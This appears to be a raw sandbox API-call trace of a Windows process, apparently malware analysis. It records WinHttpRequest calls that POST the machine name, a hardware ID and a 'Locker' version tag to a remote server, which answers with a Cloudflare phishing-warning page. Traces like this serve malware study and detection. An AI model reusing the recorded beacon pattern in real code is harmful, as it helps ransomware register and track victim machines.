RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a258 [0268.202] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1a78 [0268.202] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a510 [0268.202] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a78 | out: hHeap=0xb80000) returned 1 [0268.202] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5768 [0268.202] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a390 [0268.202] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2e8 [0268.202] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1a78 [0268.202] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a510 | out: hHeap=0xb80000) returned 1 [0268.202] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a510 [0268.202] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a78 | out: hHeap=0xb80000) returned 1 [0268.202] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.202] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9b620 [0268.202] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a510 | out: hHeap=0xb80000) returned 1 [0268.202] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a948 | out: hHeap=0xb80000) returned 1 [0268.202] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a348 | out: hHeap=0xb80000) returned 1 [0268.202] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a270 | out: hHeap=0xb80000) returned 1 [0268.202] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3a8 | out: hHeap=0xb80000) returned 1 [0268.202] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a228 | out: hHeap=0xb80000) returned 1 [0268.202] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a258 | out: hHeap=0xb80000) returned 1 [0268.202] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5790 | out: hHeap=0xb80000) returned 1 [0268.202] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a258 [0268.202] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1a78 [0268.202] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xca79b8 [0268.202] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x22) returned 0xdab940 [0268.203] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xbc3298, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x75efc0*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x75f0c4 | out: rgDispId=0x75f0c4*=2) returned 0x0 [0268.203] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdab940 | out: hHeap=0xb80000) returned 1 [0268.203] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xbc3298, iTInfo=0x0, lcid=0x800, ppTInfo=0x75efb8 | out: ppTInfo=0x75efb8*=0xdb817c) returned 0x0 [0268.203] ITypeInfo:RemoteGetTypeAttr (in: This=0xdb817c, ppTypeAttr=0x75efb0, pDummy=0x356310 | out: ppTypeAttr=0x75efb0, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.203] ITypeInfo:LocalGetIDsOfNames (This=0xdb817c) returned 0x0 [0268.203] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x0, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.203] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.203] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x1, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.203] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbbb318 [0268.203] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x2, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.203] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbbb318 [0268.203] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x3, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.203] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.203] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x4, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.203] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.203] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x5, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.203] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.203] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x6, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.203] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.203] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x7, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.204] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.204] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x8, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.204] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.204] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x9, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.204] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.204] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0xa, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.204] ITypeInfo:LocalReleaseTypeAttr (This=0xdb817c) returned 0xd678e0 [0268.204] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.204] WinHttpRequest:IUnknown:Release (This=0xdb817c) returned 0x1 [0268.204] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x34) returned 0xdd6018 [0268.204] WinHttpRequest:IDispatch:Invoke (in: This=0xbc3298, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x75f0a8*(rgvarg=([0]=0xdd601c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xdd602c*(varType=0x8, wReserved1=0x0, wReserved2=0x254c, wReserved3=0x2251, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f070, puArgErr=0x75f0b8 | out: pDispParams=0x75f0a8*(rgvarg=([0]=0xdd601c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xdd602c*(varType=0x8, wReserved1=0x0, wReserved2=0x254c, wReserved3=0x2251, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f070*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x75f0b8*=0x2b5995) returned 0x0 [0268.204] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xca79b8 | out: hHeap=0xb80000) returned 1 [0268.204] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3a8 [0268.205] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a270 [0268.205] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc18d8 [0268.205] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdd6018 | out: hHeap=0xb80000) returned 1 [0268.205] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a258 | out: hHeap=0xb80000) returned 1 [0268.205] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a78 | out: hHeap=0xb80000) returned 1 [0268.205] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a258 [0268.205] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3a8 | out: hHeap=0xb80000) returned 1 [0268.205] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfa520 | out: hHeap=0xb80000) returned 1 [0268.206] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b48 | out: hHeap=0xb80000) returned 1 [0268.206] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2e8 | out: hHeap=0xb80000) returned 1 [0268.206] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a390 | out: hHeap=0xb80000) returned 1 [0268.206] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9b620 | out: hHeap=0xb80000) returned 1 [0268.206] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.206] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5768 | out: hHeap=0xb80000) returned 1 [0268.206] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ad8 | out: hHeap=0xb80000) returned 1 [0268.206] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a270 | out: hHeap=0xb80000) returned 1 [0268.206] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc18d8 | out: hHeap=0xb80000) returned 1 [0268.206] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a258 | out: hHeap=0xb80000) returned 1 [0268.206] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0268.206] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc18d8 [0268.206] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a258 [0268.206] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1ad8 [0268.206] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5768 [0268.206] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a270 [0268.206] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.206] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9b620 [0268.206] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5790 [0268.206] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a390 [0268.206] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.206] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a270 | out: hHeap=0xb80000) returned 1 [0268.206] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9b620 | out: hHeap=0xb80000) returned 1 [0268.207] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5768 | out: hHeap=0xb80000) returned 1 [0268.207] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9b620 [0268.207] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1b48 [0268.207] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xca79b8 [0268.207] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xa) returned 0xc9a270 [0268.207] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xbc3298, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x75efc0*="Send", cNames=0x1, lcid=0x800, rgDispId=0x75f0c4 | out: rgDispId=0x75f0c4*=5) returned 0x0 [0268.207] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a270 | out: hHeap=0xb80000) returned 1 [0268.207] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xbc3298, iTInfo=0x0, lcid=0x800, ppTInfo=0x75efb8 | out: ppTInfo=0x75efb8*=0xdb817c) returned 0x0 [0268.207] ITypeInfo:RemoteGetTypeAttr (in: This=0xdb817c, ppTypeAttr=0x75efb0, pDummy=0x356310 | out: ppTypeAttr=0x75efb0, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.207] ITypeInfo:LocalGetIDsOfNames (This=0xdb817c) returned 0x0 [0268.207] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x0, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.207] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.207] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x1, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.207] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbbb318 [0268.207] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x2, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.207] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbbb318 [0268.207] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x3, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.207] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.207] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x4, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.208] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.208] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x5, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.208] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.208] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x6, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.208] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.208] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x7, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.208] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.208] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x8, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.208] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.208] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x9, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.208] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.208] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0xa, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.208] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.208] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0xb, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.208] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.208] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0xc, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.208] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.208] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0xd, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.208] ITypeInfo:LocalReleaseTypeAttr (This=0xdb817c) returned 0xd678e0 [0268.208] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.208] WinHttpRequest:IUnknown:Release (This=0xdb817c) returned 0x1 [0268.208] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x24) returned 0xdaba90 [0268.209] WinHttpRequest:IDispatch:Invoke (in: This=0xbc3298, dispIdMember=5, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x75f0a8*(rgvarg=([0]=0xdaba94*(varType=0x8, wReserved1=0xda, wReserved2=0x10, wReserved3=0x0, varVal1="pcname=XDUWTFONO&hwid=eYbnCejgY7fv1ANGNjVDI8utz&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f070, puArgErr=0x75f0b8 | out: pDispParams=0x75f0a8*(rgvarg=([0]=0xdaba94*(varType=0x8, wReserved1=0xda, wReserved2=0x10, wReserved3=0x0, varVal1="pcname=XDUWTFONO&hwid=eYbnCejgY7fv1ANGNjVDI8utz&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f070*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x75f0b8*=0x2b5995) returned 0x0 [0268.359] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xca79b8 | out: hHeap=0xb80000) returned 1 [0268.359] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd3ac20 [0268.359] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd3acf8 [0268.360] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472d0 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc2880 | out: hHeap=0xb80000) returned 1 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1928 | out: hHeap=0xb80000) returned 1 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99df0 | out: hHeap=0xb80000) returned 1 [0268.360] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc99df0 [0268.360] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x80) returned 0xbe6eb8 [0268.360] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1928 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdaba90 | out: hHeap=0xb80000) returned 1 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9b620 | out: hHeap=0xb80000) returned 1 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b48 | out: hHeap=0xb80000) returned 1 [0268.360] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9b620 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd3ac20 | out: hHeap=0xb80000) returned 1 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a258 | out: hHeap=0xb80000) returned 1 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ad8 | out: hHeap=0xb80000) returned 1 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a390 | out: hHeap=0xb80000) returned 1 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5790 | out: hHeap=0xb80000) returned 1 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc18d8 | out: hHeap=0xb80000) returned 1 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd3acf8 | out: hHeap=0xb80000) returned 1 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472d0 | out: hHeap=0xb80000) returned 1 [0268.360] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9b620 | out: hHeap=0xb80000) returned 1 [0268.360] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0268.360] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd472d0 [0268.361] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9b620 [0268.361] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd472f0 [0268.361] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9b620 | out: hHeap=0xb80000) returned 1 [0268.361] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5790 [0268.361] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9b620 [0268.361] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47290 [0268.361] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xca79b8 [0268.361] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1a) returned 0xda5a88 [0268.361] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xbc3298, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x75efc0*="ResponseText", cNames=0x1, lcid=0x800, rgDispId=0x75f0c4 | out: rgDispId=0x75f0c4*=9) returned 0x0 [0268.361] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5a88 | out: hHeap=0xb80000) returned 1 [0268.361] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x14) returned 0xde2cf8 [0268.361] WinHttpRequest:IDispatch:Invoke (in: This=0xbc3298, dispIdMember=9, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x3, pDispParams=0x75f0a8*(rgvarg=0xde2cfc, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x75f090, pExcepInfo=0x75f070, puArgErr=0x75f0b8 | out: pDispParams=0x75f0a8*(rgvarg=0xde2cfc, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x75f090*(varType=0x8, wReserved1=0x7738, wReserved2=0xc, wReserved3=0x0, varVal1="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", varVal2=0xc991a8), pExcepInfo=0x75f070*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x75f0b8*=0x2b5995) returned 0x0 [0268.370] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xca79b8 | out: hHeap=0xb80000) returned 1 [0268.370] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd3ad10 [0268.370] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1fb0) returned 0xe0dce0 [0268.370] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xd47260 [0268.370] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde2cf8 | out: hHeap=0xb80000) returned 1 [0268.370] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9b620 | out: hHeap=0xb80000) returned 1 [0268.370] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47290 | out: hHeap=0xb80000) returned 1 [0268.370] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9b620 [0268.370] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd3ad10 | out: hHeap=0xb80000) returned 1 [0268.370] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda5790 | out: hHeap=0xb80000) returned 1 [0268.370] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472f0 | out: hHeap=0xb80000) returned 1 [0268.370] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd472d0 | out: hHeap=0xb80000) returned 1 [0268.370] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda5790 [0268.370] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd3ad10 [0268.370] RtlAllocateHeap 